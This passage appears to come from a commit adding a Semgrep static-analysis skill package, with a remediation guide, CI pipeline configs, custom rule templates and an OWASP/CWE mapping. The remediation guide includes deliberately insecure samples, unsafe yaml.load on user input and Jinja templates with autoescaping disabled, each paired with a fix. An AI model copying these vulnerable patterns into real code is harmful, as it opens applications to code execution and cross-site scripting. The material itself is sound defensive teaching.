app.run(debug=DEBUG, host='127.0.0.1', port=5000)
```
### B506: YAML Load
**Vulnerable Code:**
```python
import yaml
# Arbitrary code execution (VERY UNSAFE)
config = yaml.load(user_input, Loader=yaml.Loader)
```
**Secure Solution:**
```python
import yaml
# Safe YAML loading (SAFE)
config = yaml.safe_load(user_input)
# For complex objects, use schema validation
from schema import Schema, And, Use, Optional
config_schema = Schema({
'database': {
'host': And(str, len),
'port': And(Use(int), lambda n: 1024 <= n <= 65535),
},
Optional('debug'): bool,
})
config = yaml.safe_load(user_input)
validated_config = config_schema.validate(config)
```
### B701, B702, B703: Template Autoescape
**Vulnerable Code:**
```python
from jinja2 import Environment
# Autoescape disabled (XSS VULNERABLE)
env = Environment(autoescape=False)
template = env.from_string(user_template)
output = template.render(name=user_input)
```
**Secure Solution:**
```python
from jinja2 import Environment, select_autoescape
from markupsafe import Markup, escape
# Enable autoescape (SAFE)
env = Environment(
autoescape=select_autoescape(['html', 'xml'])
)
# Or for all templates
env = Environment(autoescape=True)
# Explicitly mark safe content
def render_html(content):
# Sanitize first
clean_content = escape(content)
return Markup(clean_content)
# Django: Ensure autoescape is enabled (default)
# In Django templates:
# {{ user_input }} <!-- Auto-escaped -->
# {{ user_input|safe }} <!-- Only use after sanitization -->
```
**Best Practices:**
- Always enable autoescape in template engines
- Never mark user input as safe without sanitization
- Use Content Security Policy (CSP) headers
- Validate and sanitize all user inputs
- Use templating libraries with secure defaults
---
## General Security Principles
1. **Defense in Depth**: Implement multiple layers of security controls
2. **Least Privilege**: Grant minimum necessary permissions
3. **Fail Securely**: Errors should not expose sensitive information
4. **Input Validation**: Validate all inputs at trust boundaries
5. **Output Encoding**: Encode data based on output context
6. **Secure Defaults**: Use secure configurations by default
7. **Keep Dependencies Updated**: Regularly update security libraries
8. **Security Testing**: Include security tests in CI/CD pipelines
## Additional Resources
- [OWASP Cheat Sheet Series](https://cheatsheetseries.owasp.org/)
- [Python Security Best Practices](https://python.readthedocs.io/en/stable/library/security_warnings.html)
- [CWE Top 25](https://cwe.mitre.org/top25/)

View File

@@ -0,0 +1,284 @@
---
name: sast-semgrep
description: >
Static application security testing (SAST) using Semgrep for vulnerability detection,
security code review, and secure coding guidance with OWASP and CWE framework mapping.
Use when: (1) Scanning code for security vulnerabilities across multiple languages,
(2) Performing security code reviews with pattern-based detection, (3) Integrating
SAST checks into CI/CD pipelines, (4) Providing remediation guidance with OWASP Top 10
and CWE mappings, (5) Creating custom security rules for organization-specific patterns,
(6) Analyzing dependencies for known vulnerabilities.
version: 0.1.0
maintainer: SirAppSec
category: appsec
tags: [sast, semgrep, vulnerability-scanning, code-security, owasp, cwe, security-review]
frameworks: [OWASP, CWE, SANS-25]
dependencies:
python: ">=3.8"
packages: [semgrep]
tools: [git]
references:
- https://semgrep.dev/docs/
- https://owasp.org/Top10/
- https://cwe.mitre.org/
---
# SAST with Semgrep
## Overview
Perform comprehensive static application security testing using Semgrep, a fast, open-source
static analysis tool. This skill provides automated vulnerability detection, security code
review workflows, and remediation guidance mapped to OWASP Top 10 and CWE standards.
## Quick Start
Scan a codebase for security vulnerabilities:
```bash
semgrep --config=auto --severity=ERROR --severity=WARNING /path/to/code
```
Run with OWASP Top 10 ruleset:
```bash
semgrep --config="p/owasp-top-ten" /path/to/code
```
## Core Workflows
### Workflow 1: Initial Security Scan
1. Identify the primary languages in the codebase
2. Run `scripts/semgrep_scan.py` with appropriate rulesets
3. Parse findings and categorize by severity (CRITICAL, HIGH, MEDIUM, LOW)
4. Map findings to OWASP Top 10 and CWE categories
5. Generate prioritized remediation report
### Workflow 2: Security Code Review
1. For pull requests or commits, run targeted scans on changed files
2. Use `semgrep --diff` to scan only modified code
3. Flag high-severity findings as blocking issues
4. Provide inline remediation guidance from `references/remediation_guide.md`
5. Link findings to secure coding patterns
### Workflow 3: Custom Rule Development
1. Identify organization-specific security patterns to detect
2. Create custom Semgrep rules in YAML format using `assets/rule_template.yaml`
3. Test rules against known vulnerable code samples
4. Integrate custom rules into CI/CD pipeline
5. Document rules in `references/custom_rules.md`
### Workflow 4: CI/CD Integration
1. Add Semgrep to CI/CD pipeline using `assets/ci_config_examples/`
2. Configure baseline scanning for pull requests
3. Set severity thresholds (fail on CRITICAL/HIGH)
4. Generate SARIF output for security dashboards
5. Track metrics: vulnerabilities found, fix rate, false positives
## Security Considerations
- **Sensitive Data Handling**: Semgrep scans code locally; ensure scan results don't leak
secrets or proprietary code patterns. Use `--max-lines-per-finding` to limit output.
- **Access Control**: Semgrep scans require read access to source code. Restrict scan
result access to authorized security and development teams.
- **Audit Logging**: Log all scan executions with timestamps, user, commit hash, and
findings count for compliance auditing.
- **Compliance**: SAST scanning supports SOC2, PCI-DSS, and GDPR compliance requirements.
Maintain scan history and remediation tracking.
- **Safe Defaults**: Use `--config=auto` for balanced detection. For security-critical
applications, use `--config="p/security-audit"` for comprehensive coverage.
## Language Support
Semgrep supports 30+ languages including:
- **Web**: JavaScript, TypeScript, Python, Ruby, PHP, Java, C#, Go
- **Mobile**: Swift, Kotlin, Java (Android)
- **Infrastructure**: Terraform, Dockerfile, YAML, JSON
- **Other**: C, C++, Rust, Scala, Solidity
## Bundled Resources
### Scripts
- `scripts/semgrep_scan.py` - Full-featured scanning with OWASP/CWE mapping and reporting
- `scripts/baseline_scan.sh` - Quick baseline scan for CI/CD
- `scripts/diff_scan.sh` - Scan only changed files (for PRs)
### References
- `references/owasp_cwe_mapping.md` - OWASP Top 10 to CWE mapping with Semgrep rules
- `references/remediation_guide.md` - Vulnerability remediation patterns by category
- `references/rule_library.md` - Curated list of useful Semgrep rulesets
### Assets
- `assets/rule_template.yaml` - Template for creating custom Semgrep rules
- `assets/ci_config_examples/` - CI/CD integration examples (GitHub Actions, GitLab CI)
- `assets/semgrep_config.yaml` - Recommended Semgrep configuration
## Common Patterns
### Pattern 1: Daily Security Baseline Scan
```bash
# Run comprehensive scan and generate report
scripts/semgrep_scan.py --config security-audit \
--output results.json \
--format json \
--severity HIGH CRITICAL
```
### Pattern 2: Pull Request Security Gate
```bash
# Scan only changed files, fail on HIGH/CRITICAL
scripts/diff_scan.sh --fail-on high \
--base-branch main \
--output sarif
```
### Pattern 3: Vulnerability Research
```bash
# Search for specific vulnerability patterns
semgrep --config "r/javascript.lang.security.audit.xss" \
--json /path/to/code | jq '.results'
```
### Pattern 4: Custom Rule Validation
```bash
# Test custom rule against vulnerable samples
semgrep --config assets/custom_rules.yaml \
--test tests/vulnerable_samples/
```
## Integration Points
### CI/CD Integration
- **GitHub Actions**: Use `semgrep/semgrep-action@v1` with SARIF upload
- **GitLab CI**: Run as security scanning job with artifact reports
- **Jenkins**: Execute as build step with quality gate integration
- **pre-commit hooks**: Run lightweight scans on staged files
See `assets/ci_config_examples/` for ready-to-use configurations.
### Security Tool Integration
- **SIEM/SOAR**: Export findings in JSON/SARIF for ingestion
- **Vulnerability Management**: Integrate with Jira, DefectDojo, or ThreadFix
- **IDE Integration**: Use Semgrep IDE plugins for real-time detection
- **Secret Scanning**: Combine with tools like trufflehog, gitleaks
### SDLC Integration
- **Requirements Phase**: Define security requirements and custom rules
- **Development**: IDE plugins provide real-time feedback
- **Code Review**: Automated security review in PR workflow
- **Testing**: Integrate with security testing framework
- **Deployment**: Final security gate before production
## Severity Classification
Semgrep findings are classified by severity:
- **CRITICAL**: Exploitable vulnerabilities (SQLi, RCE, Auth bypass)
- **HIGH**: Significant security risks (XSS, CSRF, sensitive data exposure)
- **MEDIUM**: Security weaknesses (weak crypto, missing validation)
- **LOW**: Code quality issues with security implications
- **INFO**: Security best practice recommendations
## Performance Optimization
For large codebases:
```bash
# Use --jobs for parallel scanning
semgrep --config auto --jobs 4
# Exclude vendor/test code
semgrep --config auto --exclude "vendor/" --exclude "test/"
# Use lightweight rulesets for faster feedback
semgrep --config "p/owasp-top-ten" --exclude-rule "generic.*"
```
## Troubleshooting
### Issue: Too Many False Positives
**Solution**:
- Use `--exclude-rule` to disable noisy rules
- Create `.semgrepignore` file to exclude false positive patterns
- Tune rules using `--severity` filtering
- Add `# nosemgrep` comments for confirmed false positives (with justification)
### Issue: Scan Taking Too Long
**Solution**:
- Use `--exclude` for vendor/generated code
- Increase `--jobs` for parallel processing
- Use targeted rulesets instead of `--config=auto`
- Run incremental scans with `--diff`
### Issue: Missing Vulnerabilities
**Solution**:
- Use comprehensive rulesets: `p/security-audit` or `p/owasp-top-ten`
- Consult `references/rule_library.md` for specialized rules
- Create custom rules for organization-specific patterns
- Combine with dynamic analysis (DAST) and dependency scanning
## Advanced Usage
### Creating Custom Rules
See `references/rule_library.md` for guidance on writing effective Semgrep rules.
Use `assets/rule_template.yaml` as a starting point.
Example rule structure:
```yaml
rules:
- id: custom-sql-injection
patterns:
- pattern: execute($QUERY)
- pattern-inside: |
$QUERY = $USER_INPUT + ...
message: Potential SQL injection from user input concatenation
severity: ERROR
languages: [python]
metadata:
cwe: "CWE-89"
owasp: "A03:2021-Injection"
```
### OWASP Top 10 Coverage
This skill provides detection for all OWASP Top 10 2021 categories.
See `references/owasp_cwe_mapping.md` for complete coverage matrix.
## Best Practices
1. **Baseline First**: Establish security baseline before enforcing gates
2. **Progressive Rollout**: Start with HIGH/CRITICAL, expand to MEDIUM over time
3. **Developer Training**: Educate team on common vulnerabilities and fixes
4. **Rule Maintenance**: Regularly update rulesets and tune for your stack
5. **Metrics Tracking**: Monitor vulnerability trends, MTTR, and false positive rate
6. **Defense in Depth**: Combine with DAST, SCA, and manual code review
## References
- [Semgrep Documentation](https://semgrep.dev/docs/)
- [Semgrep Rule Registry](https://semgrep.dev/explore)
- [OWASP Top 10 2021](https://owasp.org/Top10/)
- [CWE Top 25](https://cwe.mitre.org/top25/)
- [SANS Top 25](https://www.sans.org/top25-software-errors/)

View File

@@ -0,0 +1,141 @@
# GitHub Actions - Semgrep Security Scanning
# Save as .github/workflows/semgrep.yml
name: Semgrep Security Scan
on:
# Scan on push to main/master
push:
branches:
- main
- master
# Scan pull requests
pull_request:
branches:
- main
- master
# Manual trigger
workflow_dispatch:
# Schedule daily scans
schedule:
- cron: '0 0 * * *' # Run at midnight UTC
jobs:
semgrep:
name: SAST Security Scan
runs-on: ubuntu-latest
# Required for uploading results to GitHub Security
permissions:
security-events: write
actions: read
contents: read
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Run Semgrep
uses: semgrep/semgrep-action@v1
with:
# Ruleset to use
config: >-
p/security-audit
p/owasp-top-ten
p/cwe-top-25
# Generate SARIF for GitHub Security
publishToken: ${{ secrets.SEMGREP_APP_TOKEN }}
publishDeployment: ${{ secrets.SEMGREP_DEPLOYMENT_ID }}
# Fail on HIGH/ERROR severity
# auditOn: push
- name: Upload SARIF to GitHub Security
if: always()
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: semgrep.sarif
- name: Upload scan results as artifact
if: always()
uses: actions/upload-artifact@v4
with:
name: semgrep-results
path: semgrep.sarif
# Alternative: Simpler configuration without Semgrep Cloud
---
name: Semgrep Security Scan (Simple)
on:
pull_request:
branches: [main, master]
push:
branches: [main, master]
jobs:
semgrep:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- name: Set up Python
uses: actions/setup-python@v5
with:
python-version: '3.11'
- name: Install Semgrep
run: pip install semgrep
- name: Run Semgrep Scan
run: |
semgrep --config="p/security-audit" \
--config="p/owasp-top-ten" \
--sarif \
--output=semgrep-results.sarif \
--severity=ERROR \
--severity=WARNING
- name: Upload SARIF results
if: always()
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: semgrep-results.sarif
# PR-specific: Only scan changed files
---
name: Semgrep PR Scan
on:
pull_request:
jobs:
semgrep-diff:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
with:
fetch-depth: 0 # Fetch full history for diff
- name: Install Semgrep
run: pip install semgrep
- name: Scan changed files only
run: |
semgrep --config="p/security-audit" \
--baseline-commit="${{ github.event.pull_request.base.sha }}" \
--json \
--output=results.json
- name: Check for findings
run: |
FINDINGS=$(jq '.results | length' results.json)
echo "Found $FINDINGS security issues"
if [ "$FINDINGS" -gt 0 ]; then
echo "❌ Security issues detected!"
jq '.results[] | "[\(.extra.severity)] \(.check_id) - \(.path):\(.start.line)"' results.json
exit 1
else
echo "✅ No security issues found"
fi

View File

@@ -0,0 +1,106 @@
# GitLab CI - Semgrep Security Scanning
# Add to .gitlab-ci.yml
stages:
- test
- security
# Basic Semgrep scan
semgrep-scan:
stage: security
image: semgrep/semgrep:latest
script:
- semgrep --config="p/security-audit"
--config="p/owasp-top-ten"
--gitlab-sast
--output=gl-sast-report.json
artifacts:
reports:
sast: gl-sast-report.json
paths:
- gl-sast-report.json
expire_in: 1 week
rules:
- if: $CI_MERGE_REQUEST_ID # Run on MRs
- if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH # Run on default branch
# Advanced: Fail on HIGH severity findings
semgrep-strict:
stage: security
image: python:3.11-slim
before_script:
- pip install semgrep
script:
- |
semgrep --config="p/security-audit" \
--severity=ERROR \
--json \
--output=results.json
CRITICAL=$(jq '[.results[] | select(.extra.severity == "ERROR")] | length' results.json)
echo "Found $CRITICAL critical findings"
if [ "$CRITICAL" -gt 0 ]; then
echo "❌ Critical security issues detected!"
jq '.results[] | select(.extra.severity == "ERROR")' results.json
exit 1
fi
artifacts:
paths:
- results.json
expire_in: 1 week
when: always
allow_failure: false
# Differential scanning - only new findings in MR
semgrep-diff:
stage: security
image: semgrep/semgrep:latest
script:
- git fetch origin $CI_MERGE_REQUEST_TARGET_BRANCH_NAME
- |
semgrep --config="p/security-audit" \
--baseline-commit="origin/$CI_MERGE_REQUEST_TARGET_BRANCH_NAME" \
--gitlab-sast \
--output=gl-sast-report.json
artifacts:
reports:
sast: gl-sast-report.json
rules:
- if: $CI_MERGE_REQUEST_ID
# Scheduled full scan (daily)
semgrep-scheduled:
stage: security
image: semgrep/semgrep:latest
script:
- |
semgrep --config="p/security-audit" \
--config="p/owasp-top-ten" \
--config="p/cwe-top-25" \
--json \
--output=full-scan-results.json
artifacts:
paths:
- full-scan-results.json
expire_in: 30 days
rules:
- if: $CI_PIPELINE_SOURCE == "schedule"
# Custom rules integration
semgrep-custom:
stage: security
image: semgrep/semgrep:latest
script:
- |
semgrep --config="p/owasp-top-ten" \
--config="custom-rules/security.yaml" \
--gitlab-sast \
--output=gl-sast-report.json
artifacts:
reports:
sast: gl-sast-report.json
rules:
- if: $CI_MERGE_REQUEST_ID
exists:
- custom-rules/security.yaml

View File

@@ -0,0 +1,190 @@
// Jenkinsfile - Semgrep Security Scanning
// Basic pipeline with Semgrep security gate
pipeline {
agent any
environment {
SEMGREP_VERSION = '1.50.0' // Pin to specific version
}
stages {
stage('Checkout') {
steps {
checkout scm
}
}
stage('Security Scan') {
steps {
script {
// Install Semgrep
sh 'pip3 install semgrep==${SEMGREP_VERSION}'
// Run Semgrep scan
sh '''
semgrep --config="p/security-audit" \
--config="p/owasp-top-ten" \
--json \
--output=semgrep-results.json \
--severity=ERROR \
--severity=WARNING
'''
}
}
}
stage('Process Results') {
steps {
script {
// Parse results
def results = readJSON file: 'semgrep-results.json'
def findings = results.results.size()
def critical = results.results.findAll {
it.extra.severity == 'ERROR'
}.size()
echo "Total findings: ${findings}"
echo "Critical findings: ${critical}"
// Fail build if critical findings
if (critical > 0) {
error("❌ Critical security vulnerabilities detected!")
}
}
}
}
}
post {
always {
// Archive scan results
archiveArtifacts artifacts: 'semgrep-results.json',
fingerprint: true
// Publish results (if using warnings-ng plugin)
// recordIssues(
// tools: [semgrep(pattern: 'semgrep-results.json')],
// qualityGates: [[threshold: 1, type: 'TOTAL', unstable: false]]
// )
}
failure {
echo '❌ Security scan failed - review findings'
}
success {
echo '✅ No critical security issues detected'
}
}
}
// Advanced: Differential scanning for PRs
pipeline {
agent any
environment {
TARGET_BRANCH = env.CHANGE_TARGET ?: 'main'
}
stages {
stage('Checkout') {
steps {
checkout scm
script {
// Fetch target branch for comparison
sh """
git fetch origin ${TARGET_BRANCH}:${TARGET_BRANCH}
"""
}
}
}
stage('Differential Scan') {
when {
changeRequest() // Only for pull requests
}
steps {
sh """
pip3 install semgrep
semgrep --config="p/security-audit" \
--baseline-commit="${TARGET_BRANCH}" \
--json \
--output=semgrep-diff.json
"""
script {
def results = readJSON file: 'semgrep-diff.json'
def newFindings = results.results.size()
if (newFindings > 0) {
echo "❌ ${newFindings} new security issues introduced"
error("Fix security issues before merging")
} else {
echo "✅ No new security issues"
}
}
}
}
stage('Full Scan') {
when {
branch 'main' // Full scan on main branch
}
steps {
sh """
semgrep --config="p/security-audit" \
--config="p/owasp-top-ten" \
--config="p/cwe-top-25" \
--json \
--output=semgrep-full.json
"""
}
}
}
post {
always {
archiveArtifacts artifacts: 'semgrep-*.json',
allowEmptyArchive: true
}
}
}
// With custom rules
pipeline {
agent any
stages {
stage('Security Scan with Custom Rules') {
steps {
sh """
pip3 install semgrep
# Run with both official and custom rules
semgrep --config="p/owasp-top-ten" \
--config="custom-rules/" \
--json \
--output=results.json
"""
script {
// Generate HTML report (requires additional tooling)
sh """
python3 -c "
import json
with open('semgrep-results.json') as f:
results = json.load(f)
findings = results['results']
print(f'Security Scan Complete:')
print(f' Total Findings: {len(findings)}')
for severity in ['ERROR', 'WARNING', 'INFO']:
count = len([f for f in findings if f.get('extra', {}).get('severity') == severity])
print(f' {severity}: {count}')
"
"""
}
}
}
}
}

View File

@@ -0,0 +1,120 @@
rules:
- id: custom-rule-template
# Pattern matching - choose one or combine multiple
pattern: dangerous_function($ARG)
# OR use pattern combinations:
# patterns:
# - pattern: execute($QUERY)
# - pattern-inside: |
# $QUERY = $USER_INPUT + ...
# - pattern-not: execute("SAFE_QUERY")
# Message shown when rule matches
message: |
Potential security vulnerability detected.
Explain the risk and provide remediation guidance.
# Severity level
severity: ERROR # ERROR, WARNING, or INFO
# Supported languages
languages: [python] # python, javascript, java, go, etc.
# Metadata for categorization and tracking
metadata:
category: security
technology: [web-app]
cwe:
- "CWE-XXX: Vulnerability Name"
owasp:
- "AXX:2021-Category Name"
confidence: HIGH # HIGH, MEDIUM, LOW
likelihood: MEDIUM # How likely is exploitation
impact: HIGH # Potential security impact
references:
- https://owasp.org/...
- https://cwe.mitre.org/data/definitions/XXX.html
subcategory:
- vuln-type # e.g., sqli, xss, command-injection
# Optional: Autofix suggestion
# fix: |
# safe_function($ARG)
# Optional: Path filtering
# paths:
# include:
# - "src/"
# exclude:
# - "*/tests/*"
# - "*/test_*.py"
# Example: SQL Injection Detection
- id: example-sql-injection
patterns:
- pattern-either:
- pattern: cursor.execute(f"... {$VAR} ...")
- pattern: cursor.execute("..." + $VAR + "...")
- pattern-not: cursor.execute("...", ...)
message: |
SQL injection vulnerability detected. User input is concatenated into SQL query.
Remediation:
- Use parameterized queries: cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))
- Use ORM methods that automatically parameterize queries
severity: ERROR
languages: [python]
metadata:
category: security
cwe: ["CWE-89: SQL Injection"]
owasp: ["A03:2021-Injection"]
confidence: HIGH
likelihood: HIGH
impact: HIGH
references:
- https://owasp.org/Top10/A03_2021-Injection/
# Example: Hard-coded Secret Detection
- id: example-hardcoded-secret
pattern-regex: |
(password|passwd|pwd|secret|token|api[_-]?key)\s*=\s*['"][^'"]{8,}['"]
message: |
Potential hard-coded secret detected.
Remediation:
- Use environment variables: os.getenv('API_KEY')
- Use secrets management: AWS Secrets Manager, HashiCorp Vault
- Never commit secrets to version control
severity: WARNING
languages: [python, javascript, java, go]
metadata:
category: security
cwe: ["CWE-798: Use of Hard-coded Credentials"]
owasp: ["A07:2021-Identification-and-Authentication-Failures"]
confidence: MEDIUM
# Example: Insecure Deserialization
- id: example-unsafe-deserialization
patterns:
- pattern-either:
- pattern: pickle.loads($DATA)
- pattern: pickle.load($FILE)
- pattern-not-inside: |
# Safe pickle usage
...
message: |
Unsafe deserialization using pickle. Attackers can execute arbitrary code.
Remediation:
- Use JSON for serialization: json.loads(data)
- If pickle is required, validate and sanitize data source
- Never deserialize data from untrusted sources
severity: ERROR
languages: [python]
metadata:
category: security
cwe: ["CWE-502: Deserialization of Untrusted Data"]
owasp: ["A08:2021-Software-and-Data-Integrity-Failures"]
confidence: HIGH
likelihood: HIGH
impact: CRITICAL

View File

@@ -0,0 +1,80 @@
# Recommended Semgrep Configuration
# Save as .semgrepconfig or semgrep.yml in your project root
# Rules to run
rules: p/security-audit
# Alternative: Specify multiple rulesets
# rules:
# - p/owasp-top-ten
# - p/cwe-top-25
# - path/to/custom-rules.yaml
# Paths to exclude from scanning
exclude:
- "*/node_modules/*"
- "*/vendor/*"
- "*/.venv/*"
- "*/venv/*"
- "*/dist/*"
- "*/build/*"
- "*/.git/*"
- "*/tests/*"
- "*/test/*"
- "*_test.go"
- "test_*.py"
- "*.test.js"
- "*.spec.js"
- "*.min.js"
- "*.bundle.js"
# Paths to include (optional - scans all by default)
# include:
# - "src/"
# - "app/"
# - "lib/"
# Maximum file size to scan (in bytes)
max_target_bytes: 1000000 # 1MB
# Timeout for each file (in seconds)
timeout: 30
# Number of jobs for parallel scanning
# jobs: 4
# Metrics and telemetry (disable for privacy)
metrics: off
# Autofix mode (use with caution)
# autofix: false
# Output format
# Can be: text, json, sarif, gitlab-sast, junit-xml, emacs, vim
# Set via CLI: semgrep --config=<this-file> --json
# output_format: text
# Severity thresholds
# Only report findings at or above this severity
# Can be: ERROR, WARNING, INFO
# min_severity: WARNING
# Scan statistics
# Show timing and performance stats
# time: false
# Show stats after scanning
# verbose: false
# CI/CD specific settings
# These are typically set via CLI or CI environment
# Fail on findings
# Set exit code 1 if findings are detected
# error: true
# Baseline commit for diff scanning
# baseline_commit: origin/main
# SARIF output settings (for GitHub Security, etc.)
# sarif:
# output: semgrep-results.sarif

View File

@@ -0,0 +1,300 @@
# OWASP Top 10 to CWE Mapping with Semgrep Rules
## Table of Contents
- [A01:2021 - Broken Access Control](#a012021---broken-access-control)
- [A02:2021 - Cryptographic Failures](#a022021---cryptographic-failures)
- [A03:2021 - Injection](#a032021---injection)
- [A04:2021 - Insecure Design](#a042021---insecure-design)
- [A05:2021 - Security Misconfiguration](#a052021---security-misconfiguration)
- [A06:2021 - Vulnerable and Outdated Components](#a062021---vulnerable-and-outdated-components)
- [A07:2021 - Identification and Authentication Failures](#a072021---identification-and-authentication-failures)
- [A08:2021 - Software and Data Integrity Failures](#a082021---software-and-data-integrity-failures)
- [A09:2021 - Security Logging and Monitoring Failures](#a092021---security-logging-and-monitoring-failures)
- [A10:2021 - Server-Side Request Forgery (SSRF)](#a102021---server-side-request-forgery-ssrf)
## A01:2021 - Broken Access Control
### CWE Mappings
- CWE-22: Path Traversal
- CWE-23: Relative Path Traversal
- CWE-35: Path Traversal
- CWE-352: Cross-Site Request Forgery (CSRF)
- CWE-434: Unrestricted Upload of Dangerous File Type
- CWE-639: Authorization Bypass Through User-Controlled Key
- CWE-918: Server-Side Request Forgery (SSRF)
### Semgrep Rules
```bash
# Path traversal detection
semgrep --config "r/python.lang.security.audit.path-traversal"
# Missing authorization checks
semgrep --config "r/generic.secrets.security.detected-generic-secret"
# CSRF protection
semgrep --config "r/javascript.express.security.audit.express-check-csurf-middleware-usage"
```
### Detection Patterns
- Unrestricted file access using user input
- Missing or improper authorization checks
- Insecure direct object references (IDOR)
- Elevation of privilege vulnerabilities
## A02:2021 - Cryptographic Failures
### CWE Mappings
- CWE-259: Use of Hard-coded Password
- CWE-326: Inadequate Encryption Strength
- CWE-327: Use of Broken/Risky Crypto Algorithm
- CWE-328: Reversible One-Way Hash
- CWE-330: Use of Insufficiently Random Values
- CWE-780: Use of RSA Without OAEP
### Semgrep Rules
```bash
# Weak crypto algorithms
semgrep --config "p/crypto"
# Hard-coded secrets
semgrep --config "p/secrets"
# Insecure random
semgrep --config "r/python.lang.security.audit.insecure-random"
```
### Detection Patterns
- Use of MD5, SHA1 for cryptographic purposes
- Hard-coded passwords, API keys, tokens
- Weak encryption algorithms (DES, RC4)
- Insecure random number generation
## A03:2021 - Injection
### CWE Mappings
- CWE-79: Cross-site Scripting (XSS)
- CWE-89: SQL Injection
- CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (eval injection)
- CWE-917: Expression Language Injection
- CWE-943: Improper Neutralization of Special Elements in Data Query Logic
### Semgrep Rules
```bash
# SQL Injection
semgrep --config "r/python.django.security.injection.sql"
semgrep --config "r/javascript.sequelize.security.audit.sequelize-injection"
# XSS
semgrep --config "r/javascript.express.security.audit.xss"
semgrep --config "r/python.flask.security.audit.template-xss"
# Command Injection
semgrep --config "r/python.lang.security.audit.dangerous-subprocess-use"
# Code Injection
semgrep --config "r/python.lang.security.audit.exec-used"
semgrep --config "r/javascript.lang.security.audit.eval-detected"
```
### Detection Patterns
- Unsafe SQL query construction
- Unescaped user input in HTML context
- OS command execution with user input
- Use of eval() or similar dynamic code execution
## A04:2021 - Insecure Design
### CWE Mappings
- CWE-209: Generation of Error Message with Sensitive Information
- CWE-256: Unprotected Storage of Credentials
- CWE-501: Trust Boundary Violation
- CWE-522: Insufficiently Protected Credentials
### Semgrep Rules
```bash
# Information disclosure
semgrep --config "r/python.flask.security.audit.debug-enabled"
# Missing security controls
semgrep --config "p/security-audit"
```
### Detection Patterns
- Debug mode enabled in production
- Verbose error messages exposing internals
- Missing rate limiting
- Insecure default configurations
## A05:2021 - Security Misconfiguration
### CWE Mappings
- CWE-16: Configuration
- CWE-611: Improper Restriction of XML External Entity Reference
- CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute
- CWE-756: Missing Custom Error Page
- CWE-776: Improper Restriction of Recursive Entity References in DTDs
### Semgrep Rules
```bash
# XXE vulnerabilities
semgrep --config "r/python.lang.security.audit.avoid-lxml-in-xml-parsing"
# Insecure cookie settings
semgrep --config "r/javascript.express.security.audit.express-cookie-settings"
# CORS misconfiguration
semgrep --config "r/javascript.express.security.audit.express-cors-misconfiguration"
```
### Detection Patterns
- XML External Entity (XXE) vulnerabilities
- Insecure cookie flags (missing Secure, HttpOnly, SameSite)
- Open CORS policies
- Unnecessary features enabled
## A06:2021 - Vulnerable and Outdated Components
### CWE Mappings
- CWE-1035: Using Components with Known Vulnerabilities
- CWE-1104: Use of Unmaintained Third Party Components
### Semgrep Rules
```bash
# Known vulnerable dependencies
semgrep --config "p/supply-chain"
# Deprecated APIs
semgrep --config "p/owasp-top-ten"
```
### Detection Patterns
- Outdated library versions
- Dependencies with known CVEs
- Use of deprecated/unmaintained packages
- Insecure package imports
## A07:2021 - Identification and Authentication Failures
### CWE Mappings
- CWE-287: Improper Authentication
- CWE-288: Authentication Bypass Using Alternate Path/Channel
- CWE-306: Missing Authentication for Critical Function
- CWE-307: Improper Restriction of Excessive Authentication Attempts
- CWE-521: Weak Password Requirements
- CWE-798: Use of Hard-coded Credentials
- CWE-916: Use of Password Hash With Insufficient Computational Effort
### Semgrep Rules
```bash
# Weak password hashing
semgrep --config "r/python.lang.security.audit.hashlib-md5-used"
# Missing authentication
semgrep --config "p/jwt"
# Session management
semgrep --config "r/javascript.express.security.audit.express-session-misconfiguration"
```
### Detection Patterns
- Weak password hashing (MD5, SHA1 without salt)
- Missing multi-factor authentication
- Predictable session identifiers
- Credential stuffing vulnerabilities
## A08:2021 - Software and Data Integrity Failures
### CWE Mappings
- CWE-345: Insufficient Verification of Data Authenticity
- CWE-502: Deserialization of Untrusted Data
- CWE-829: Inclusion of Functionality from Untrusted Control Sphere
- CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes
### Semgrep Rules
```bash
# Unsafe deserialization
semgrep --config "r/python.lang.security.audit.unsafe-pickle"
semgrep --config "r/javascript.lang.security.audit.unsafe-deserialization"
# Prototype pollution
semgrep --config "r/javascript.lang.security.audit.prototype-pollution"
```
### Detection Patterns
- Unsafe deserialization (pickle, YAML, JSON)
- Missing integrity checks on updates
- Prototype pollution in JavaScript
- Unsafe code loading from external sources
## A09:2021 - Security Logging and Monitoring Failures
### CWE Mappings
- CWE-117: Improper Output Neutralization for Logs
- CWE-223: Omission of Security-relevant Information
- CWE-532: Information Exposure Through Log Files
- CWE-778: Insufficient Logging
### Semgrep Rules
```bash
# Log injection
semgrep --config "r/python.lang.security.audit.logging-unsanitized-input"
# Sensitive data in logs
semgrep --config "p/secrets"
```
### Detection Patterns
- Log injection vulnerabilities
- Sensitive data logged (passwords, tokens)
- Missing security event logging
- Insufficient audit trails
## A10:2021 - Server-Side Request Forgery (SSRF)
### CWE Mappings
- CWE-918: Server-Side Request Forgery (SSRF)
### Semgrep Rules
```bash
# SSRF detection
semgrep --config "r/python.requests.security.audit.requests-http-request"
semgrep --config "r/javascript.lang.security.audit.detect-unsafe-url"
```
### Detection Patterns
- Unvalidated URL fetching
- Internal network access via user input
- Missing URL validation
- Bypassing access controls via SSRF
## Using This Mapping
### Scan for Specific OWASP Category
```bash
# Example: Scan for Injection vulnerabilities (A03)
semgrep --config "r/python.django.security.injection.sql" \
--config "r/python.lang.security.audit.exec-used" \
/path/to/code
```
### Comprehensive OWASP Top 10 Scan
```bash
semgrep --config="p/owasp-top-ten" /path/to/code
```
### Filter by CWE
```bash
# Scan and filter results by CWE
semgrep --config="p/security-audit" --json /path/to/code | \
jq '.results[] | select(.extra.metadata.cwe == "CWE-89")'
```
## References
- [OWASP Top 10 2021](https://owasp.org/Top10/)
- [CWE/SANS Top 25](https://cwe.mitre.org/top25/)
- [Semgrep Rule Registry](https://semgrep.dev/explore)

View File

@@ -0,0 +1,471 @@
# Vulnerability Remediation Guide
Security remediation patterns organized by vulnerability category.
## Table of Contents
- [SQL Injection](#sql-injection)
- [Cross-Site Scripting (XSS)](#cross-site-scripting-xss)
